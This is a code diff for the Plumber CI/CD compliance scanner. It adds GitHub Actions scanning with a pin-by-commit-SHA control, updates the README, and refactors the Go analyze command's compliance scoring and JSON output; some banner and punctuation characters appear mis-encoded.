diff --git a/.plumber.yaml b/.plumber.yaml
index 75d039f..7275691 100644
--- a/.plumber.yaml
+++ b/.plumber.yaml
@@ -547,4 +547,44 @@ controls:
# When true, also flags insecure daemon configuration
# (DOCKER_TLS_CERTDIR="" or DOCKER_HOST tcp://...:2375)
# in jobs that use a DinD service.
- detectInsecureDaemon: true
\ No newline at end of file
+ detectInsecureDaemon: true
+
+ # ===========================================
+ # Actions must be pinned by commit SHA (GitHub Actions only)
+ # ===========================================
+ # Flags workflow steps whose `uses:` reference is not a 40-character
+ # commit SHA. Tag/branch refs (v4, main) are mutable: if the action's
+ # maintainer is compromised, or retags a release, the caller workflow
+ # silently runs new code with its secrets. This is the vector behind
+ # the March 2025 tj-actions/changed-files compromise (CVE-2025-30066).
+ #
+ # Enabled by default: pin-by-SHA is the single highest-value
+ # supply-chain control on GitHub Actions, and the default
+ # trustedOwners list exempts first-party (`actions/*`, `github/*`)
+ # actions so the initial signal on a fresh repo stays focused on
+ # the third-party surface. Pair with Dependabot
+ # (`version-update-strategy: sha-and-version`) to keep pins fresh.
+ # Disable (`enabled: false`) if the project is not yet ready to
+ # migrate off tag pins — the other 29 rules remain active.
+ actionsMustBePinnedByCommitSha:
+ enabled: true
+
+ # Action-owner prefixes exempt from the pin-by-SHA requirement.
+ # Only list owners already inside the workflow's trust boundary.
+ # "actions" and "github" cover the first-party GitHub-owned
+ # actions the runtime trusts implicitly; anything else re-opens
+ # the supply-chain risk this check exists to close.
+ trustedOwners:
+ - actions
+ - github
+
+# ===========================================
+# Engine — experimental Rego/OPA rule engine
+# ===========================================
+# Opt-in, off by default. When enabled, Plumber will evaluate the
+# multi-provider Rego policies. The engine runs in shadow mode
+# alongside the legacy Go controls until they are removed — see
+# docs/REFACTOR_MULTI_PROVIDER.md §8 (Phase A).
+engine:
+ # Turn the Rego/OPA engine on. Default: false (opt-in).
+ enabled: true
\ No newline at end of file
diff --git a/README.md b/README.md
index c5f4c79..b5e3bc2 100644
--- a/README.md
+++ b/README.md
@@ -5,7 +5,8 @@
- CI/CD compliance scanner for GitLab pipelines
+ CI/CD compliance scanner for GitLab pipelines
+ Also scans GitHub Actions workflows locally when origin is GitHub (no API token).
@@ -36,7 +37,7 @@
## 🤔 What is Plumber?
-Plumber is a compliance scanner for GitLab. It reads your `.gitlab-ci.yml` and repository settings, then checks for security and compliance issues like:
+Plumber is a compliance scanner for CI/CD. On **GitLab**, it reads your `.gitlab-ci.yml` (and related includes) and repository settings via the API. On **GitHub**, when you run it from a clone whose `origin` points at GitHub and you do not pass `--gitlab-url` / `--project`, it scans **local** `.github/workflows/*.{yml,yaml}` with the same Rego policy engine (no GitHub API call, no token). It checks for issues like:
- Container images using mutable tags (`latest`, `dev`)
- Container images from untrusted registries
@@ -50,7 +51,7 @@ Plumber is a compliance scanner for GitLab. It reads your `.gitlab-ci.yml` and r
- Weakened security jobs (`allow_failure: true`, `when: manual`, `rules: [{when: never}]`) on SAST, Secret Detection, and other scanners (OWASP CICD-SEC-4)
- Docker-in-Docker (dind) services enabling container escape on shared runners
-**How does it work?** Plumber connects to your GitLab instance via API, analyzes your pipeline configuration, and reports any issues it finds. You define what's allowed in a config file (`.plumber.yaml`), and Plumber tells you if your project complies. When running locally from your git repo, Plumber uses your **local CI configuration file** (`.gitlab-ci.yml` by default, or a [custom path](#custom-ci-configuration-file-path)) allowing you to validate changes before pushing.
+**How does it work?** On GitLab, Plumber connects via API, analyzes your pipeline configuration, and reports issues. You define what's allowed in `.plumber.yaml`. When your local clone is the analyzed project, Plumber can use your **local** `.gitlab-ci.yml` (or a [custom path](#custom-ci-configuration-file-path)) so you can validate before push. On the **GitHub local** path, analysis is offline from workflow files only; compliance is **binary** (any finding fails the run) until per-control percentage parity lands; `--threshold` does not gate pass/fail yet. **`GITLAB_TOKEN` is only required for the GitLab API path.** To analyze GitLab while standing in a GitHub clone, pass `--gitlab-url` and `--project` explicitly (that forces the GitLab analyzer).
@@ -73,6 +74,7 @@ Choose **one** of these methods. You don't need both:
- [CLI](#option-1-cli)
- [GitLab CI Component](#option-2-gitlab-ci-component)
- [Configuration](#%EF%B8%8F-configuration)
+ - [Multi-provider configuration (roadmap)](#multi-provider-configuration-roadmap)
- [Available Controls](#available-controls)
- [Artifacts & Outputs](#-artifacts--outputs)
- [JSON Report](#json-report)
@@ -323,9 +325,24 @@ Flags:
This creates `.plumber.yaml` with sensible [defaults](./.plumber.yaml). Customize it to fit your needs.
+### Multi-provider configuration (roadmap)
+
+Plumber already uses a **single** root file (`.plumber.yaml`) with a shared `controls:` map and an optional `engine:` section (see the repo [`.plumber.yaml`](./.plumber.yaml)). **GitLab** and **GitHub** policies today draw from that surface where codes overlap; GitHub-only checks use issue codes that map through the same registry.
+
+**Near term (minimal churn):** keep one file. Prefer documenting provider-specific knobs inline next to each control (as today) until GitHub reaches feature parity with GitLab for reporting (threshold, PBOM, MR/badge).
+
+**When GitLab and GitHub diverge more clearly**, choose one of:
+
+| Approach | Pros | Cons |
+|----------|------|------|
+| **Single file, nested keys** (e.g. `controls.foo.gitlab` / `controls.foo.github` or `providers.gitlab` / `providers.github`) | One place to review policy | Larger schema; loader must merge defaults carefully |
+| **Split files** (e.g. `.plumber.yaml` + `.plumber.github.yaml`, or `include:` from the main file) | Clear ownership per platform | Extra paths to document and validate in CI |
+
+**Recommendation for later:** add optional includes first (`extends` / `include` list in YAML), then introduce nested overrides only where one control truly differs by platform. That avoids breaking existing repos that rely on the flat `controls` keys.
+
### Available Controls
-Plumber includes 14 compliance controls. Each can be enabled/disabled and customized in [.plumber.yaml](.plumber.yaml):
+Plumber documents **14** primary GitLab-oriented controls in this section (the defaults in [`.plumber.yaml`](./.plumber.yaml)); Rego also enforces **additional GitHub-specific issue codes** when you run the local GitHub Actions path. See the codebase issue registry and [docs](docs/) for the full code list. Each can be enabled/disabled and customized in [.plumber.yaml](.plumber.yaml):
1. Container images must not use forbidden tags
@@ -903,10 +920,10 @@ brew install plumber
To install a specific version:
```bash
-brew install getplumber/plumber/plumber@1
+brew install getplumber/plumber/plumber@0.2.7
```
-> **Note:** Versioned formulas are keg-only. Use the full path for example `/usr/local/opt/plumber@0.2.21/bin/plumber` or run `brew link plumber@0.2.21` to add it to your PATH.
+> **Note:** Versioned formulas are keg-only. Use the full path for example `/usr/local/opt/plumber@0.2.7/bin/plumber` or run `brew link plumber@0.2.7` to add it to your PATH.
### Mise
@@ -1028,7 +1045,14 @@ make build # or make install to build and copy to /usr/local/bin/
### `plumber analyze`
-Run compliance analysis on a GitLab project.
+Runs the compliance analyzer. **Behavior depends on the git remote (and flags):**
+
+| Mode | When | What runs |
+|------|------|-----------|
+| **GitLab** | `origin` is a GitLab host, or you pass `--gitlab-url` and `--project` | Fetches CI config and project data via the GitLab API (requires `GITLAB_TOKEN`). Uses per-control compliance and `--threshold`. |
+| **GitHub (local)** | `origin` is GitHub **and** you do **not** set `--gitlab-url` or `--project` | Reads `.github/workflows/*.{yml,yaml}` from the repo root only; **no** API token. Pass/fail is **any finding** (binary) for now; **`--threshold` does not** change exit code. **`--pbom` / `--pbom-cyclonedx`**, **`--mr-comment`**, and **`--badge`** are GitLab-only today. |
+
+To **force GitLab** analysis from a machine that has a GitHub `origin` (e.g. a fork), set `--gitlab-url` and `--project` explicitly.
```bash
plumber analyze [flags]
@@ -1041,11 +1065,11 @@ plumber analyze [flags]
| `--gitlab-url` | No* | auto-detect | GitLab instance URL |
| `--project` | No* | auto-detect | Project path (e.g., `group/project`) |
| `--config` | No | `.plumber.yaml` | Path to config file |
-| `--threshold` | No | `100` | Minimum compliance % to pass (0-100) |
-| `--branch` | No | default | Branch to analyze |
+| `--threshold` | No | `100` | Minimum compliance % to pass (0-100). **Gates exit code on the GitLab path only** (not the GitHub local path yet). |
+| `--branch` | No | default | Branch to analyze (GitLab API path; informational on GitHub local scan) |
| `--output` | No | β | Write JSON results to file |
-| `--pbom` | No | β | Write PBOM (Pipeline Bill of Materials) to file |
-| `--pbom-cyclonedx` | No | β | Write PBOM in CycloneDX SBOM format |
+| `--pbom` | No | — | Write PBOM (Pipeline Bill of Materials) to file (**GitLab path**; ignored on GitHub local scan) |
+| `--pbom-cyclonedx` | No | — | Write PBOM in CycloneDX SBOM format (**GitLab path**; ignored on GitHub local scan) |
| `--print` | No | `true` | Print text output to stdout |
| `--mr-comment` | No | `false` | Post/update a compliance comment on the merge request (MR pipelines only: requires `api` scope) |
| `--badge` | No | `false` | Create/update a Plumber compliance badge on the project (requires `api` scope; only runs on default branch) |
@@ -1065,7 +1089,7 @@ plumber analyze [flags]
| Variable | Required | Description |
|----------|----------|-------------|
-| `GITLAB_TOKEN` | Yes | GitLab API token with `read_api` + `read_repository` scopes (from a Maintainer or higher). Use `api` scope instead if `--mr-comment` or `--badge` is enabled. |
+| `GITLAB_TOKEN` | **Yes** for the **GitLab API** path | GitLab API token with `read_api` + `read_repository` scopes (Maintainer or higher). Use `api` scope instead if `--mr-comment` or `--badge` is enabled. **Not used** on the GitHub local workflow scan. |
| `PLUMBER_NO_UPDATE_CHECK` | No | Set to any value (e.g., `1`) to disable the automatic version check. |
### Automatic Version Check
@@ -1086,9 +1110,9 @@ export PLUMBER_NO_UPDATE_CHECK=1
| Exit Code | Meaning |
|-----------|----------|
-| `0` | Analysis passed (compliance ≥ threshold) |
-| `1` | Compliance failure (compliance < threshold) |
-| `2` | Runtime error (config error, network failure, missing token, etc.) |
+| `0` | Analysis passed: GitLab path — compliance ≥ threshold; GitHub local path — **no** findings |
+| `1` | Compliance failure: GitLab — compliance below `--threshold`; GitHub local — one or more findings |
+| `2` | Runtime error (config error, network failure, missing token on GitLab path, etc.) |
### `plumber config init`
diff --git a/cmd/analyze.go b/cmd/analyze.go
index e35d046..4fc1b59 100644
--- a/cmd/analyze.go
+++ b/cmd/analyze.go
@@ -1,6 +1,7 @@
package cmd
import (
+ "bytes"
"encoding/json"
"fmt"
"os"
@@ -8,6 +9,9 @@ import (
"strings"
"unicode/utf8"
+ "github.com/charmbracelet/lipgloss"
+ "github.com/charmbracelet/lipgloss/table"
+ "github.com/getplumber/plumber/collector"
"github.com/getplumber/plumber/configuration"
"github.com/getplumber/plumber/control"
glabCI "github.com/getplumber/plumber/gitlab"
@@ -30,8 +34,8 @@ var (
pbomCycloneDXFile string
mrComment bool
badge bool
- showScore bool
- showScorePoint bool
+ showScore bool
+ showScorePoint bool
controlsFilter string
skipControls string
ciConfigPath string
@@ -39,19 +43,18 @@ var (
var analyzeCmd = &cobra.Command{
Use: "analyze",
- Short: "Analyze a GitLab project's CI/CD pipeline",
+ Short: "Analyze CI/CD configuration (GitLab via API, or local GitHub Actions when origin is GitHub)",
SilenceUsage: true, // Don't print usage on errors (e.g., threshold failures)
- Long: `Analyze a GitLab project's CI/CD pipeline for compliance issues.
+ Long: `Analyze CI/CD configuration for compliance issues.
-This command connects to a GitLab instance, retrieves the project's CI/CD
-configuration, and runs various checks including:
-- Pipeline origin analysis (components, templates, local files)
-- Pipeline image analysis (registries, tags)
-- Mutable image tag detection
-- Image digest pinning enforcement
+GitLab path (when the git remote is GitLab, or when you pass --gitlab-url and --project):
+ Connects to GitLab, retrieves CI/CD configuration and project settings, and runs
+ checks including pipeline origins, images, tags, and branch protection.
+ Required environment variable: GITLAB_TOKEN
-Required environment variables:
- GITLAB_TOKEN GitLab API token (required)
+GitHub path (when origin is GitHub and --gitlab-url / --project are not set):
+ Scans local .github/workflows only (Rego). No GitLab token. Some flags apply only
+ to the GitLab API path (see README).
Flags (auto-detected from git remote if not specified):
--gitlab-url GitLab instance URL (auto-detected from git remote)
@@ -149,6 +152,19 @@ func runAnalyze(cmd *cobra.Command, args []string) error {
gitRemoteURL = remoteInfo.URL
gitRemoteProjectPath = remoteInfo.ProjectPath
+ // Multi-provider dispatch: GitHub projects take the Rego-only,
+ // local-file path. GitLab (and self-hosted) continue to use the
+ // full legacy analyzer below.
+ //
+ // Explicit --gitlab-url / --project flags always win over
+ // auto-detection: a user inside a GitHub clone may legitimately
+ // want to analyse a GitLab project they passed by hand
+ // (cross-checks, demos, scripted regression runs). Only
+ // dispatch to the GitHub path when the caller did not override.
+ if remoteInfo.Provider == "github" && !gitlabURLFromFlag && !projectFromFlag {
+ return runGitHubAnalyze(cmd, remoteInfo)
+ }
+
if !gitlabURLFromFlag {
gitlabURL = remoteInfo.URL
fmt.Fprintf(os.Stderr, "Auto-detected GitLab URL: %s\n", gitlabURL)
@@ -268,85 +284,42 @@ func runAnalyze(cmd *cobra.Command, args []string) error {
return fmt.Errorf("analysis failed: %w", err)
}
- // Calculate overall compliance (average of all enabled controls)
- var complianceSum float64 = 0
+ // Overall compliance is the share of enabled controls that emitted
+ // no finding. One control = one unit, regardless of how many
+ // findings it produces. Skipped controls are excluded from both
+ // sides of the ratio so disabling a control does not change the
+ // score. When no controls are enabled the score falls back to 0 β
+ // same semantic as the legacy averaging loop: if nothing can be
+ // verified, nothing can be trusted.
+ //
+ // A missing or invalid CI configuration short-circuits to 0:
+ // the absence of findings under those conditions is evidence that
+ // nothing could be analysed, not that the project is compliant.
+ // Without this guard a project with no .gitlab-ci.yml or a
+ // syntactically broken one would score 100% β letting attackers
+ // pass the gate by deleting or breaking the CI file.
+ compliance := 0.0
controlCount := 0
-
- if result.ImageForbiddenTagsResult != nil && !result.ImageForbiddenTagsResult.Skipped {
- complianceSum += result.ImageForbiddenTagsResult.Compliance
- controlCount++
- }
-
- if result.ImageAuthorizedSourcesResult != nil && !result.ImageAuthorizedSourcesResult.Skipped {
- complianceSum += result.ImageAuthorizedSourcesResult.Compliance
- controlCount++
- }
-
- if result.BranchProtectionResult != nil && !result.BranchProtectionResult.Skipped {
- complianceSum += result.BranchProtectionResult.Compliance
- controlCount++
- }
-
- if result.HardcodedJobsResult != nil && !result.HardcodedJobsResult.Skipped {
- complianceSum += result.HardcodedJobsResult.Compliance
- controlCount++
- }
-
- if result.OutdatedIncludesResult != nil && !result.OutdatedIncludesResult.Skipped {
- complianceSum += result.OutdatedIncludesResult.Compliance
- controlCount++
- }
-
- if result.ForbiddenVersionsIncludesResult != nil && !result.ForbiddenVersionsIncludesResult.Skipped {
- complianceSum += result.ForbiddenVersionsIncludesResult.Compliance
- controlCount++
- }
-
- if result.RequiredComponentsResult != nil && !result.RequiredComponentsResult.Skipped {
- complianceSum += result.RequiredComponentsResult.Compliance
- controlCount++
- }
-
- if result.RequiredTemplatesResult != nil && !result.RequiredTemplatesResult.Skipped {
- complianceSum += result.RequiredTemplatesResult.Compliance
- controlCount++
- }
-
- if result.DebugTraceResult != nil && !result.DebugTraceResult.Skipped {
- complianceSum += result.DebugTraceResult.Compliance
- controlCount++
- }
-
- if result.VariableInjectionResult != nil && !result.VariableInjectionResult.Skipped {
- complianceSum += result.VariableInjectionResult.Compliance
- controlCount++
- }
-
- if result.SecurityJobsWeakenedResult != nil && !result.SecurityJobsWeakenedResult.Skipped {
- complianceSum += result.SecurityJobsWeakenedResult.Compliance
- controlCount++
- }
-
- if result.UnverifiedScriptsResult != nil && !result.UnverifiedScriptsResult.Skipped {
- complianceSum += result.UnverifiedScriptsResult.Compliance
- controlCount++
- }
-
- if result.JobVariablesOverrideResult != nil && !result.JobVariablesOverrideResult.Skipped {
- complianceSum += result.JobVariablesOverrideResult.Compliance
- controlCount++
- }
-
- if result.DockerInDockerResult != nil && !result.DockerInDockerResult.Skipped {
- complianceSum += result.DockerInDockerResult.Compliance
- controlCount++
- }
-
- // Calculate average compliance
- // If no controls ran (e.g., data collection failed), compliance is 0% - we can't verify anything
- var compliance float64 = 0
- if controlCount > 0 {
- compliance = complianceSum / float64(controlCount)
+ if !result.CiMissing && result.CiValid {
+ findingCountsByControl := map[string]int{}
+ for _, f := range result.Findings {
+ if info := control.LookupCode(control.ErrorCode(f.Code)); info != nil {
+ findingCountsByControl[info.ControlName]++
+ }
+ }
+ passed := 0
+ for _, e := range control.GitLabControls(conf.PlumberConfig) {
+ if e.Skipped {
+ continue
+ }
+ controlCount++
+ if findingCountsByControl[e.ControlName] == 0 {
+ passed++
+ }
+ }
+ if controlCount > 0 {
+ compliance = float64(passed) * 100.0 / float64(controlCount)
+ }
}
var scoreResult *control.PlumberScoreResult
@@ -358,14 +331,14 @@ func runAnalyze(cmd *cobra.Command, args []string) error {
// Print text output to stdout if enabled
if printOutput {
- if err := outputText(result, threshold, compliance, controlCount, scoreResult, scoreMode, scorePointMode); err != nil {
+ if err := outputText(result, conf.PlumberConfig, threshold, compliance, controlCount, scoreResult, scoreMode, scorePointMode); err != nil {
return err
}
}
// Write JSON to file if specified
if outputFile != "" {
- if err := writeJSONToFile(result, threshold, compliance, outputFile, scoreResult, scoreMode); err != nil {
+ if err := writeJSONToFile(result, conf.PlumberConfig, threshold, compliance, outputFile, scoreResult, scoreMode); err != nil {
return err
}
fmt.Fprintf(os.Stderr, "Results written to: %s\n", outputFile)
@@ -391,7 +364,7 @@ func runAnalyze(cmd *cobra.Command, args []string) error {
if mrComment {
if mrIID := glabCI.DetectMergeRequestIID(); mrIID != 0 {
fmt.Fprintf(os.Stderr, "Merge request pipeline detected (MR !%d), posting compliance comment...\n", mrIID)
- if err := control.ManageMergeRequestComment(result.ProjectID, mrIID, result, compliance, threshold, conf, scoreResult, scoreMode, scorePointMode); err != nil {
+ if err := control.ManageMergeRequestComment(result.ProjectID, mrIID, result, conf.PlumberConfig, compliance, threshold, conf, scoreResult, scoreMode, scorePointMode); err != nil {
// Log but don't fail the analysis for a comment error
fmt.Fprintf(os.Stderr, "Warning: failed to post merge request comment: %v\n", err)
} else {
@@ -513,35 +486,146 @@ func parseControlsFilter(raw string) ([]string, error) {
return controls, nil
}
-func writeJSONToFile(result *control.AnalysisResult, threshold, compliance float64, filePath string, score *control.PlumberScoreResult, scoreMode bool) error {
- // Create output with threshold info
- output := struct {
- *control.AnalysisResult
- Threshold float64 `json:"threshold"`
- Compliance float64 `json:"compliance"`
- Passed bool `json:"passed"`
- PlumberScore *control.PlumberScoreResult `json:"plumberScore,omitempty"`
- }{
- AnalysisResult: result,
- Threshold: threshold,
- Compliance: compliance,
- Passed: compliance >= threshold,
+func writeJSONToFile(result *control.AnalysisResult, pc *configuration.PlumberConfig, threshold, compliance float64, filePath string, score *control.PlumberScoreResult, scoreMode bool) error {
+ // Marshal AnalysisResult into a generic map so the per-control
+ // `*Result` legacy blocks can sit alongside its existing fields
+ // without forcing every consumer to follow the dev's flat-findings
+ // shape. The legacy keys (imageForbiddenTagsResult, β¦) carry the
+ // same issues + metrics + compliance triplet v0.2.x emitted, so
+ // downstream tooling parses the dev output unchanged.
+ raw, err := json.Marshal(result)
+ if err != nil {
+ return fmt.Errorf("marshal result: %w", err)
+ }
+ output := map[string]any{}
+ if err := json.Unmarshal(raw, &output); err != nil {
+ return fmt.Errorf("unmarshal result: %w", err)
}
+ output["threshold"] = threshold
+ output["compliance"] = compliance
+ output["passed"] = compliance >= threshold
if scoreMode && score != nil {
- s := *score
- output.PlumberScore = &s
+ output["plumberScore"] = score
}
+ for k, v := range legacyResultsByName(result, pc) {
+ output[k] = v
+ }
+ // Drop the flat Rego findings list from the file: consumers should use
+ // the per-control *Result blocks (issues/metrics/compliance), matching
+ // the preβflat-findings JSON shape.
+ delete(output, "findings")
- // Create/overwrite the file
- file, err := os.Create(filePath)
+ // Encode with intentional key order so readers see project/context first,
+ // scoring next, then per-control *Result blocks (not Go map lexical order).
+ payload, err := marshalLegacyAnalysisJSONObject(output)
if err != nil {
+ return fmt.Errorf("marshal ordered analysis JSON: %w", err)
+ }
+ if err := os.WriteFile(filePath, payload, 0o644); err != nil {
return fmt.Errorf("failed to create output file: %w", err)
}
- defer func() { _ = file.Close() }()
+ return nil
+}
- encoder := json.NewEncoder(file)
- encoder.SetIndent("", " ")
- return encoder.Encode(output)
+// analysisJSONLegacyKeyHead is the canonical top-level key order before any
+// *Result control blocks so analysis.json reads: project → CI context →
+// outcome/score → findings (per-control).
+var analysisJSONLegacyKeyHead = []string{
+ "projectPath", "projectId", "defaultBranch",
+ "ciConfigSource", "ciValid", "ciMissing", "ciErrors",
+ "pipelineOriginMetrics", "pipelineImageMetrics",
+ "compliance", "threshold", "passed", "plumberScore",
+}
+
+func legacyAnalysisJSONKeyOrder(m map[string]any) []string {
+ seen := make(map[string]bool, len(m))
+ order := make([]string, 0, len(m))
+ for _, k := range analysisJSONLegacyKeyHead {
+ if _, ok := m[k]; ok {
+ order = append(order, k)
+ seen[k] = true
+ }
+ }
+ var suffixResult []string
+ for k := range m {
+ if seen[k] {
+ continue
+ }
+ if strings.HasSuffix(k, "Result") {
+ suffixResult = append(suffixResult, k)
+ }
+ }
+ sort.Strings(suffixResult)
+ for _, k := range suffixResult {
+ order = append(order, k)
+ seen[k] = true
+ }
+ var rest []string
+ for k := range m {
+ if !seen[k] {
+ rest = append(rest, k)
+ }
+ }
+ sort.Strings(rest)
+ order = append(order, rest...)
+ return order
+}
+
+func marshalLegacyAnalysisJSONObject(output map[string]any) ([]byte, error) {
+ keys := legacyAnalysisJSONKeyOrder(output)
+ step := " "
+ var buf bytes.Buffer
+ buf.WriteString("{\n")
+ first := true
+ for _, k := range keys {
+ v, ok := output[k]
+ if !ok {
+ continue
+ }
+ if !first {
+ buf.WriteString(",\n")
+ }
+ first = false
+
+ keyBytes, err := json.Marshal(k)
+ if err != nil {
+ return nil, fmt.Errorf("key %s: %w", k, err)
+ }
+ rawVal, err := json.Marshal(v)
+ if err != nil {
+ return nil, fmt.Errorf("%s value: %w", k, err)
+ }
+
+ buf.WriteString(step)
+ buf.Write(keyBytes)
+ buf.WriteString(": ")
+ if len(rawVal) > 0 && (rawVal[0] == '{' || rawVal[0] == '[') {
+ rawIndented, err := json.MarshalIndent(v, "", step)
+ if err != nil {
+ return nil, fmt.Errorf("%s indentation: %w", k, err)
+ }
+ trimmed := bytes.TrimSpace(rawIndented)
+ lines := bytes.Split(trimmed, []byte("\n"))
+ if len(lines) == 1 {
+ buf.Write(lines[0])
+ continue
+ }
+ // Opening bracket on the same line as the key; body lines indented.
+ buf.Write(lines[0])
+ buf.WriteByte('\n')
+ for i := 1; i < len(lines)-1; i++ {
+ buf.WriteString(step)
+ buf.Write(lines[i])
+ buf.WriteByte('\n')
+ }
+ buf.WriteString(step)
+ buf.Write(lines[len(lines)-1])
+ continue
+ }
+ buf.Write(rawVal)
+ }
+ buf.WriteString("\n}\n")
+ return buf.Bytes(), nil
}
// buildImageComplianceData extracts compliance results into a lookup map for the PBOM generator
@@ -550,57 +634,63 @@ func buildImageComplianceData(result *control.AnalysisResult) *pbom.ImageComplia
ForbiddenTagImages: make(map[string]bool),
UnauthorizedImages: make(map[string]bool),
}
-
- // Build set of images with forbidden tags from control results
- if result.ImageForbiddenTagsResult != nil && !result.ImageForbiddenTagsResult.Skipped {
- // Mark all images as NOT having forbidden tags first
- if result.PipelineImageData != nil {
- for _, img := range result.PipelineImageData.Images {
- data.ForbiddenTagImages[img.Link] = false
- }
- }
- // Then mark the ones that do
- for _, issue := range result.ImageForbiddenTagsResult.Issues {
- data.ForbiddenTagImages[issue.Link] = true
- }
+ if result.PipelineImageData == nil {
+ return data
}
-
- // Build set of unauthorized images from control results
- if result.ImageAuthorizedSourcesResult != nil && !result.ImageAuthorizedSourcesResult.Skipped {
- // Mark all images as authorized first
- if result.PipelineImageData != nil {
- for _, img := range result.PipelineImageData.Images {
- data.UnauthorizedImages[img.Link] = false
- }
+ imagesByJob := make(map[string]string, len(result.PipelineImageData.Images))
+ for _, img := range result.PipelineImageData.Images {
+ imagesByJob[img.Job] = img.Link
+ data.ForbiddenTagImages[img.Link] = false
+ data.UnauthorizedImages[img.Link] = false
+ }
+ // Flip flags based on Rego findings. Image-pinning codes
+ // (ISSUE-102/103) mark forbidden-tag; ISSUE-101 marks unauthorized.
+ for _, f := range result.Findings {
+ link, ok := imagesByJob[f.Job]
+ if !ok {
+ continue
}
- // Then mark the ones that aren't
- for _, issue := range result.ImageAuthorizedSourcesResult.Issues {
- data.UnauthorizedImages[issue.Link] = true
+ switch control.ErrorCode(f.Code) {
+ case control.CodeImageForbiddenTag, control.CodeImageNotPinnedByDigest:
+ data.ForbiddenTagImages[link] = true
+ case control.CodeImageUnauthorizedSource:
+ data.UnauthorizedImages[link] = true
}
}
-
return data
}
// buildIncludeOverrideData extracts override detection results into a lookup map for the PBOM generator.
-// Keys are clean include paths (without version/instance prefix).
+// Keys are clean include paths (without version/instance prefix). The data
+// now comes directly from the collector-enriched IR that the Rego engine
+// already uses — no dependency on the legacy Go controls.
func buildIncludeOverrideData(result *control.AnalysisResult) *pbom.IncludeOverrideData {
data := &pbom.IncludeOverrideData{
Overrides: make(map[string][]utils.OverriddenJobDetail),
}
-
- if r := result.RequiredComponentsResult; r != nil && !r.Skipped {
- for _, issue := range r.OverriddenIssues {
- data.Overrides[issue.ComponentPath] = issue.OverriddenJobs
- }
+ if result.PipelineOriginData == nil {
+ return data
}
-
- if r := result.RequiredTemplatesResult; r != nil && !r.Skipped {
- for _, issue := range r.OverriddenIssues {
- data.Overrides[issue.TemplatePath] = issue.OverriddenJobs
+ for idx := range result.PipelineOriginData.Origins {
+ o := &result.PipelineOriginData.Origins[idx]
+ location := o.GitlabIncludeOrigin.Location
+ if location == "" {
+ location = o.GitlabComponent.ComponentIncludePath
+ }
+ if location == "" {
+ continue
}
+ key := utils.CleanOriginPath(location)
+ irJobs := collector.CollectOverriddenJobs(o, result.PipelineOriginData)
+ if len(irJobs) == 0 {
+ continue
+ }
+ details := make([]utils.OverriddenJobDetail, 0, len(irJobs))
+ for _, j := range irJobs {
+ details = append(details, utils.OverriddenJobDetail{JobName: j.Name, OverriddenKeys: j.Keys})
+ }
+ data.Overrides[key] = details
}
-
return data
}
@@ -849,646 +939,109 @@ func sortControlSummariesForIssuesTable(s []controlSummary) {
})
}
+// printBanner renders the Plumber ASCII-art banner followed by the
+// tagline and community link. The banner keeps Plumber's signature
+// green color for brand recognition.
func printBanner() {
- fmt.Printf("\n")
- fmt.Printf("%s", colorGreenBright)
- fmt.Printf(" βββββββ βββ βββ βββ ββββ βββββββββββ βββββββββββββββ \n")
- fmt.Printf(" βββββββββββ βββ βββ βββββ βββββββββββββββββββββββββββββ\n")
- fmt.Printf(" βββββββββββ βββ βββ βββββββββββββββββββββββββ ββββββββ\n")
- fmt.Printf(" βββββββ βββ βββ βββ βββββββββββββββββββββββββ ββββββββ\n")
- fmt.Printf(" βββ βββββββββββββββββ βββ βββ ββββββββββββββββββββββ βββ\n")
- fmt.Printf(" βββ ββββββββ βββββββ βββ ββββββββββ βββββββββββ βββ\n")
- fmt.Printf("%s", colorReset)
- fmt.Printf(" %sCI/CD Compliance Scanner for GitLab Pipelines%s\n", colorBold, colorReset)
- fmt.Printf(" %sJoin our community: %shttps://getplumber.io/discord%s\n\n", colorDim, colorCyan, colorReset)
+ asciiArt := lipgloss.NewStyle().Foreground(colPass).Bold(true).Render(
+ " βββββββ βββ βββ βββ ββββ βββββββββββ βββββββββββββββ \n" +
+ " βββββββββββ βββ βββ βββββ βββββββββββββββββββββββββββββ\n" +
+ " βββββββββββ βββ βββ βββββββββββββββββββββββββ ββββββββ\n" +
+ " βββββββ βββ βββ βββ βββββββββββββββββββββββββ ββββββββ\n" +
+ " βββ βββββββββββββββββ βββ βββ ββββββββββββββββββββββ βββ\n" +
+ " βββ ββββββββ βββββββ βββ ββββββββββ βββββββββββ βββ",
+ )
+ fmt.Println()
+ fmt.Println(asciiArt)
+ fmt.Printf(" %s %s\n",
+ styleTitle.Render("CI/CD Compliance Scanner for GitLab & GitHub Actions"),
+ styleMuted.Render("v"+Version),
+ )
+ fmt.Printf(" %s %s\n\n",
+ styleMuted.Render("Join our community:"),
+ styleAccent.Render("https://getplumber.io/discord"),
+ )
}
-func outputText(result *control.AnalysisResult, threshold, compliance float64, controlCount int, score *control.PlumberScoreResult, scoreMode, scorePointMode bool) error {
+func outputText(result *control.AnalysisResult, pc *configuration.PlumberConfig, threshold, compliance float64, controlCount int, score *control.PlumberScoreResult, scoreMode, scorePointMode bool) error {
// Collect control summaries for tables
var controls []controlSummary
// Header
- fmt.Printf("\n%sProject: %s%s\n\n", colorBold, result.ProjectPath, colorReset)
+ fmt.Printf("\n%s %s\n\n", styleTitle.Render("Project:"), result.ProjectPath)
// Warning if no controls could be evaluated
if controlCount == 0 {
- fmt.Printf(" %sβ WARNING: No controls could be evaluated!%s\n", colorRed, colorReset)
+ fmt.Printf(" %s\n", styleError.Render("β WARNING: No controls could be evaluated!"))
if len(result.CiErrors) > 0 {
- fmt.Printf(" %sCI configuration errors:%s\n", colorRed, colorReset)
+ fmt.Printf(" %s\n", styleError.Render("CI configuration errors:"))
+ bullet := styleError.Render("β’")
for _, e := range result.CiErrors {
- fmt.Printf(" %sβ’%s %s\n", colorRed, colorReset, e)
+ fmt.Printf(" %s %s\n", bullet, e)
}
fmt.Println()
} else if result.CiMissing {
- fmt.Printf(" %sCI configuration file is missing from the project.%s\n\n", colorDim, colorReset)
+ fmt.Printf(" %s\n\n", styleDim.Render("CI configuration file is missing from the project."))
} else {
- fmt.Printf(" %sData collection failed - compliance defaults to 0%%.%s\n", colorDim, colorReset)
- fmt.Printf(" %sUse --verbose for more info.%s\n\n", colorDim, colorReset)
+ fmt.Printf(" %s\n", styleDim.Render("Data collection failed - compliance defaults to 0%."))
+ fmt.Printf(" %s\n\n", styleDim.Render("Use --verbose for more info."))
}
}
// CI config source info
if result.CIConfigSource == "local" {
- fmt.Printf(" %sCI Config Source: local file%s\n\n", colorCyan, colorReset)
- }
-
- // Control 1: Container images must not use forbidden tags
- if result.ImageForbiddenTagsResult != nil {
